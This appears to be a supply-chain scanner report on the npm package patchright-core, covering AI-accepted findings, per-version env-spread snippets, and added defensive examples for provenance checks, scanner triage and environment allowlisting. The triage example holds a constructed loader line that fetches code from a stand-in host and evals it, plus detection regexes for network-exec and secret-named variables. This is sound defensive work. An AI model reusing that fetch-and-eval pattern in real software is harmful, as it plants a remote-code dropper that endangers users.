patchright-core
Supply chain provenance
Status for the latest visible version.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | net-exec-file:lib/vite/traceViewer/assets/defaultSettingsView-C8oeflxp.js | AI (source-diff): Vite-bundled React UI with modulepreload fetch; not malicious. | ai | |
| source-diff | obfuscated-file:lib/coreBundle.js | AI (source-diff): esbuild-bundled core; standard for Playwright-based packages. | ai | |
| source-diff | obfuscated-file:lib/vite/traceViewer/assets/defaultSettingsView-C8oeflxp.js | AI (source-diff): Vite-bundled React UI asset with license headers intact. | ai | |
| source-diff | obfuscated-file:lib/vite/dashboard/assets/index-DpEq2p62.js | AI (source-diff): Vite-bundled dashboard UI asset; minification expected. | ai | |
| source-diff | obfuscated-file:lib/vite/recorder/assets/index-HP8IFpDn.js | AI (source-diff): Vite-bundled recorder UI asset; minification expected. | ai | |
| source-diff | obfuscated-file:lib/vite/traceViewer/index.C0VxHueI.js | AI (source-diff): Vite-bundled trace viewer asset; minification expected. | ai | |
| source-diff | obfuscated-file:lib/vite/traceViewer/uiMode.APN9uGJo.js | AI (source-diff): Vite-bundled trace viewer UI mode asset; minification expected. | ai | |
| source-diff | net-exec-file:lib/coreBundle.js | AI (source-diff): Browser automation core bundle; network + exec is inherent to its purpose. | ai | |
| source-diff | obfuscated-file:lib/vite/traceViewer/assets/codeMirrorModule-DHnJSckh.js | AI (source-diff): Vite-bundled CodeMirror asset; minification is expected for this package's UI components. | ai | |
| source-diff | obfuscated-file:lib/vite/recorder/assets/codeMirrorModule-Dk5H3Tt4.js | AI (source-diff): Vite-bundled CodeMirror asset; minification is expected. | ai | |
| semgrep | semgrep:child-process-import | AI (semgrep): Browser automation library requires child_process to launch browser binaries; expected pattern. | ai | |
| semgrep | semgrep:base64-decode | AI (semgrep): Network message handling in Playwright uses base64 for binary data transport; legitimate use. | ai | |
| semgrep | semgrep:dynamic-require | AI (semgrep): Reads package.json from browser reference directories to get version info; not arbitrary module loading. | ai | |
| semgrep | semgrep:new-function-constructor | AI (semgrep): Used to validate/parse JS expressions in Playwright's JS evaluation API; standard pattern. | ai | |
| semgrep | semgrep:env-bulk-read | AI (semgrep): Minified bundle; env enumeration is part of Playwright's config/environment handling. | ai | |
| bogus-package | bogus-package | AI (bogus-package): Core bundle package; no runtime deps and minimal README are expected for this package type. | ai | |
| semgrep | semgrep:env-spread | AI (semgrep): Playwright-pattern: spreading process.env when spawning browser subprocess is standard and documented. | ai | |
Versions (showing 9 of 9)
| Version | Deps | Published |
|---|---|---|
| 1.60.2 | 0 / 0 | |
| 1.60.1 | 0 / 0 | |
| 1.60.0 | 0 / 0 | |
| 1.59.4 | 0 / 0 | |
| 1.59.3 | 0 / 0 | |
| 1.59.2 | 0 / 0 | |
| 1.59.1 | 0 / 0 | |
| 1.59.0 | 0 / 0 | |
| 1.58.2 | 0 / 0 | |
v1.60.2
1 finding
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
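The attestation line above (repeated for every version listed on this page) says the tarball was published from CI with a Sigstore-signed in-toto statement whose predicate is SLSA provenance v1. What that buys you depends on checking the statement's contents against what you expect, not just on its existence. The following is an added example, not code from patchright-core or from the scanner: it applies a small policy to a constructed SLSA v1 statement. The subject digest, workflow ref, repository URL and builder id in the sample are assumptions for illustration; signature verification over the Sigstore bundle is a separate step that `npm audit signatures` performs for installed packages.

```javascript
// Added example (not patchright-core's code): policy checks on an in-toto
// Statement carrying a SLSA v1 provenance predicate. This checks the
// statement's *contents*; verifying the Sigstore signature over it is a
// separate step (`npm audit signatures` does both for an installed tree).

const SLSA_V1 = "https://slsa.dev/provenance/v1";
const INTOTO_V1 = "https://in-toto.io/Statement/v1";

// Constructed sample statement. Digest, ref, repository and builder id are
// assumptions made for this example, not values taken from the registry.
const sampleStatement = {
  _type: INTOTO_V1,
  subject: [
    { name: "pkg:npm/patchright-core@1.60.2", digest: { sha256: "ab".repeat(32) } },
  ],
  predicateType: SLSA_V1,
  predicate: {
    buildDefinition: {
      buildType: "https://actions.github.io/buildtypes/workflow/v1",
      externalParameters: {
        workflow: {
          ref: "refs/tags/v1.60.2",
          repository: "https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs",
          path: ".github/workflows/publish.yml",
        },
      },
    },
    runDetails: {
      builder: { id: "https://github.com/actions/runner/github-hosted" },
    },
  },
};

// Returns { ok, problems } so a caller can log every mismatch, not only the first.
function checkProvenance(statement, expected) {
  const problems = [];
  if (statement._type !== INTOTO_V1) problems.push(`unexpected statement type ${statement._type}`);
  if (statement.predicateType !== SLSA_V1) problems.push(`predicateType is ${statement.predicateType}, not ${SLSA_V1}`);

  // The subject binds the attestation to one exact tarball: the sha256 you
  // compute locally must appear among the subjects under the package's purl.
  const subjects = Array.isArray(statement.subject) ? statement.subject : [];
  const matching = subjects.filter(
    s => s.name === expected.subjectName && s.digest && s.digest.sha256 === expected.sha256,
  );
  if (matching.length === 0) problems.push(`no subject matches ${expected.subjectName} sha256=${expected.sha256}`);

  const pred = statement.predicate || {};
  const bd = pred.buildDefinition || {};
  const wf = (bd.externalParameters || {}).workflow || {};
  const builderId = ((pred.runDetails || {}).builder || {}).id;

  // The claims a reviewer actually cares about: which repository, which kind
  // of ref, and whether a hosted runner (not a developer machine) built it.
  if (wf.repository !== expected.repository) problems.push(`built from ${wf.repository}, expected ${expected.repository}`);
  if (expected.refPrefix && !(wf.ref || "").startsWith(expected.refPrefix)) problems.push(`ref ${wf.ref} does not start with ${expected.refPrefix}`);
  if (!expected.builderIds.includes(builderId)) problems.push(`builder ${builderId} not in allowlist`);

  return { ok: problems.length === 0, problems };
}

// Expected values; in practice sha256 comes from `shasum -a 256` over the
// tarball you downloaded, and the repository from the package's metadata.
const provenancePolicy = {
  subjectName: "pkg:npm/patchright-core@1.60.2",
  sha256: "ab".repeat(32),
  repository: "https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs",
  refPrefix: "refs/tags/",
  builderIds: ["https://github.com/actions/runner/github-hosted"],
};

function demoProvenance() {
  const good = checkProvenance(sampleStatement, provenancePolicy);
  // A statement whose subject digest differs from the local tarball must fail,
  // even though every other field is untouched.
  const tampered = JSON.parse(JSON.stringify(sampleStatement));
  tampered.subject[0].digest.sha256 = "cd".repeat(32);
  const bad = checkProvenance(tampered, provenancePolicy);
  return { good, bad };
}
```

The digest check is the one that matters most: an attestation that does not name the exact bytes you installed proves nothing about them. The repository and builder checks are what turn "has provenance" into "built from the project's own repo on a hosted runner", which is the claim the page's "strongest supply chain integrity signal" wording is relying on.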
v1.60.1
11 findings
8 × Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
2 × Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
These ten source-diff findings correspond to the eight obfuscated-file rows and two net-exec-file rows under Accepted risks, where each is attributed to Vite or esbuild bundle output rather than to hand-obfuscated code.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v1.60.0
11 findings
8 × Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
2 × Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
The same ten source-diff findings as reported for v1.60.1, matching the obfuscated-file and net-exec-file rows under Accepted risks.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
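The two heuristics behind the v1.60.1 and v1.60.0 findings are simple: a longest-line threshold (3000 characters) and the co-occurrence of network and dynamic-execution calls in one file. What the reviewer added when accepting them was context: a bundler license banner, a source-map reference, a known Vite asset path. The following is an added example, not the scanner's rule set or patchright-core's code: it reimplements both heuristics with my own approximate regexes and then records the bundler markers a reviewer would look for, so a minified asset with a banner and a banner-less file that fetches and evals come out with different verdicts. The three input files are constructed.

```javascript
// Added example (not the scanner's rules, not patchright-core's code): a
// triage pass that reproduces the "lines over 3000 chars" and "network +
// dynamic exec in one file" heuristics, then adds the bundler-marker context
// a reviewer uses before accepting such findings. Regexes are my own
// approximation of what such rules match.

const LINE_THRESHOLD = 3000;

const NETWORK_RE = /(\bfetch\s*\(|\bXMLHttpRequest\b|\bWebSocket\s*\(|\bhttps?\.(?:request|get)\s*\(|\bnet\.connect\s*\()/;
const DYNAMIC_EXEC_RE = /(\beval\s*\(|\bnew\s+Function\s*\(|\bchild_process\b|\.exec\s*\()/;
// A /*! ... */ or /** ... */ comment mentioning a license near the top of the
// file is what bundlers such as Vite and esbuild keep from their inputs.
const LICENSE_BANNER_RE = /^\s*\/\*[!*][\s\S]*?(license|copyright)[\s\S]*?\*\//i;
const SOURCE_MAP_RE = /\/\/[#@]\s*sourceMappingURL=\S+/;

function triageSource(path, text) {
  const lines = text.split(/\r?\n/);
  const maxLineLength = lines.reduce((m, l) => Math.max(m, l.length), 0);
  const longLines = lines.filter(l => l.length > LINE_THRESHOLD).length;
  const signals = {
    maxLineLength,
    longLines,
    networkCalls: NETWORK_RE.test(text),
    dynamicExec: DYNAMIC_EXEC_RE.test(text),
    licenseBanner: LICENSE_BANNER_RE.test(text.slice(0, 4000)), // banner must be near the top
    sourceMap: SOURCE_MAP_RE.test(text),
  };

  // The two findings as the scanner names them.
  const findings = [];
  if (signals.longLines > 0) findings.push("obfuscated-file");
  if (signals.networkCalls && signals.dynamicExec) findings.push("net-exec-file");

  // Verdict: no finding is clean; a finding explained by bundler markers is
  // "likely-bundled" (still worth a diff against a rebuild); a finding with
  // no such explanation goes to a human.
  const bundlerMarkers = signals.licenseBanner || signals.sourceMap;
  let verdict;
  if (findings.length === 0) verdict = "clean";
  else if (bundlerMarkers) verdict = "likely-bundled";
  else verdict = "review";

  return { path, findings, signals, verdict };
}

function triageAll(files) {
  const out = {};
  for (const [path, text] of Object.entries(files)) out[path] = triageSource(path, text);
  return out;
}

// Constructed inputs: a banner-carrying minified UI bundle that also uses
// fetch and new Function, a banner-less loader that fetches and evals, and a
// plain module. None of these are files from patchright-core.
const sampleFiles = {
  "lib/vite/sample/assets/index-sample.js":
    "/*! sample bundle v1.0 | MIT License */\n" +
    "var a=1;".repeat(500) + 'fetch("/x");new Function("return 1")();' +
    "\n//# sourceMappingURL=index-sample.js.map\n",
  "lib/loader-sample.js":
    "var p=" + JSON.stringify("x".repeat(3100)) +
    ';fetch("http://example.invalid/p").then(r=>r.text()).then(t=>eval(t));\n',
  "lib/plain-sample.js":
    "module.exports = function add(a, b) { return a + b; };\n",
};

function demoTriage() {
  return triageAll(sampleFiles);
}
```

"likely-bundled" is not a clean bill of health; it means the long lines are explained by a bundler, and the next step is to rebuild the tagged source and diff the output, which the provenance attestation above makes feasible. One caveat specific to this package: Vite emits content-hashed asset names (the `index-DpEq2p62.js` style paths in the Accepted risks table), so every rebuild produces a "newly added" file and the obfuscated-file rule will fire again on each release.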
v1.59.3
4 findings
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/outofprocess.js#L52
```
50 |   stdio: "pipe",
51 |   detached: true,
> 52 |   env: {
53 |     ...process.env,
54 |     ...env
```
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L302
```
300 |   const { stdout, code } = await (0, import_spawnAsync.spawnAsync)(executable, [filePath], {
301 |     cwd: dirname,
> 302 |     env: {
303 |       ...process.env,
304 |       LD_LIBRARY_PATH: process.env.LD_LIBRARY_PATH ? `${process.env.LD_LIBRARY_PATH}:${dirname}` : dirname
```
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L319
```
317 |   const { stdout, code } = await (0, import_spawnAsync.spawnAsync)("ldd", [filePath], {
318 |     cwd: dirname,
> 319 |     env: {
320 |       ...process.env,
321 |       LD_LIBRARY_PATH
```
All three sites hand the full parent environment to a child process (the spawn in outofprocess.js and the two in server/registry/dependencies.js, one of which runs ldd). A Node spawn with no env option inherits process.env in exactly the same way, so the exposure is whatever environment the automation process itself was started with; the semgrep:env-spread row under Accepted risks records this as an expected Playwright pattern.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v1.59.2
4 findings
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/outofprocess.js#L52
```
50 |   stdio: "pipe",
51 |   detached: true,
> 52 |   env: {
53 |     ...process.env,
54 |     ...env
```
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L302
```
300 |   const { stdout, code } = await (0, import_spawnAsync.spawnAsync)(executable, [filePath], {
301 |     cwd: dirname,
> 302 |     env: {
303 |       ...process.env,
304 |       LD_LIBRARY_PATH: process.env.LD_LIBRARY_PATH ? `${process.env.LD_LIBRARY_PATH}:${dirname}` : dirname
```
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L319
```
317 |   const { stdout, code } = await (0, import_spawnAsync.spawnAsync)("ldd", [filePath], {
318 |     cwd: dirname,
> 319 |     env: {
320 |       ...process.env,
321 |       LD_LIBRARY_PATH
```
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v1.59.1
4 findings
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/outofprocess.js#L52
```
50 |   stdio: "pipe",
51 |   detached: true,
> 52 |   env: {
53 |     ...process.env,
54 |     ...env
```
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L302
```
300 |   const { stdout, code } = await (0, import_spawnAsync.spawnAsync)(executable, [filePath], {
301 |     cwd: dirname,
> 302 |     env: {
303 |       ...process.env,
304 |       LD_LIBRARY_PATH: process.env.LD_LIBRARY_PATH ? `${process.env.LD_LIBRARY_PATH}:${dirname}` : dirname
```
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L319
```
317 |   const { stdout, code } = await (0, import_spawnAsync.spawnAsync)("ldd", [filePath], {
318 |     cwd: dirname,
> 319 |     env: {
320 |       ...process.env,
321 |       LD_LIBRARY_PATH
```
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v1.59.0
4 findings
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/01b2b1533e0bfa1c582117e3ec109fcb57657747/lib/outofprocess.js#L52
```
50 |   stdio: "pipe",
51 |   detached: true,
> 52 |   env: {
53 |     ...process.env,
54 |     ...env
```
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/01b2b1533e0bfa1c582117e3ec109fcb57657747/lib/server/registry/dependencies.js#L302
```
300 |   const { stdout, code } = await (0, import_spawnAsync.spawnAsync)(executable, [filePath], {
301 |     cwd: dirname,
> 302 |     env: {
303 |       ...process.env,
304 |       LD_LIBRARY_PATH: process.env.LD_LIBRARY_PATH ? `${process.env.LD_LIBRARY_PATH}:${dirname}` : dirname
```
Spreading entire process.env into an object — may capture all secrets
Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/01b2b1533e0bfa1c582117e3ec109fcb57657747/lib/server/registry/dependencies.js#L319
```
317 |   const { stdout, code } = await (0, import_spawnAsync.spawnAsync)("ldd", [filePath], {
318 |     cwd: dirname,
> 319 |     env: {
320 |       ...process.env,
321 |       LD_LIBRARY_PATH
```
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
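The same three process.env findings are reported for v1.59.3, v1.59.2, v1.59.1 and v1.59.0, and accepted under semgrep:env-spread. The following is an added example, not patchright-core's code: it places the flagged `{ ...process.env, ...env }` shape next to an allowlisted alternative and runs both over a constructed parent environment, so the difference in what reaches the child is visible without spawning anything. The LD_LIBRARY_PATH construction mirrors the dependencies.js snippet; the allowlist of variable names and the sample secrets are assumptions made for this example, not a statement of what a browser launch actually requires.

```javascript
// Added example (not patchright-core's code): the flagged process.env spread
// beside an allowlisted variant. Both are pure functions over plain objects;
// with child_process.spawn the result would be passed as the `env` option.

// Constructed parent environment; the two credential-looking entries are
// made up and exist only to show what a full spread forwards.
const sampleParentEnv = {
  PATH: "/usr/local/bin:/usr/bin:/bin",
  HOME: "/home/ci",
  DISPLAY: ":99",
  LD_LIBRARY_PATH: "/opt/lib",
  NPM_TOKEN: "npm_constructedSecret",
  AWS_SECRET_ACCESS_KEY: "constructedSecret",
};

// The pattern the scanner flagged: everything in the parent env reaches the
// child, plus caller-supplied overrides. Node's spawn defaults to process.env
// when no env option is given, so this is equivalent to the default.
function spreadEnv(parentEnv, extra) {
  return { ...parentEnv, ...extra };
}

// Same LD_LIBRARY_PATH construction as the dependencies.js snippet, applied
// to an explicit env object rather than to process.env directly.
function withLibraryDir(env, dirname) {
  return {
    ...env,
    LD_LIBRARY_PATH: env.LD_LIBRARY_PATH ? `${env.LD_LIBRARY_PATH}:${dirname}` : dirname,
  };
}

// Hardened variant: copy only the variables the child is known to need.
// This list is an assumption for a Linux browser launch made for the
// example; the right set depends on the binary being spawned.
const DEFAULT_ALLOWLIST = ["PATH", "HOME", "DISPLAY", "LANG", "LD_LIBRARY_PATH", "TMPDIR", "XDG_RUNTIME_DIR"];

function allowlistedEnv(parentEnv, extra, allowlist = DEFAULT_ALLOWLIST) {
  const child = {};
  for (const key of allowlist) {
    if (parentEnv[key] !== undefined) child[key] = parentEnv[key];
  }
  return { ...child, ...extra };
}

// Audit helper: which keys in a child env look like credentials? Name-based
// matching is a heuristic and will miss secrets under innocuous names.
const SECRET_KEY_RE = /(TOKEN|SECRET|PASSWORD|PASSWD|API_KEY|PRIVATE_KEY|CREDENTIALS)/i;

function leakedSecrets(childEnv) {
  return Object.keys(childEnv).filter(k => SECRET_KEY_RE.test(k)).sort();
}

function demoEnv() {
  const extra = { EXAMPLE_FLAG: "1" }; // constructed stand-in for the caller's `env` argument
  const spread = withLibraryDir(spreadEnv(sampleParentEnv, extra), "/opt/browser");
  const limited = withLibraryDir(allowlistedEnv(sampleParentEnv, extra), "/opt/browser");
  return { spread, limited };
}
```

Because an omitted env option already inherits process.env, the spread the scanner flagged does not widen exposure on its own; the lever a consumer controls is which environment the automation process runs with, or passing an allowlisted env when launching it. An allowlist that is too narrow breaks the launch in ways that depend on the browser and platform, which is why the reviewer's acceptance of the spread as the documented Playwright behaviour is a reasonable call for a library, and why tightening it belongs in the calling application.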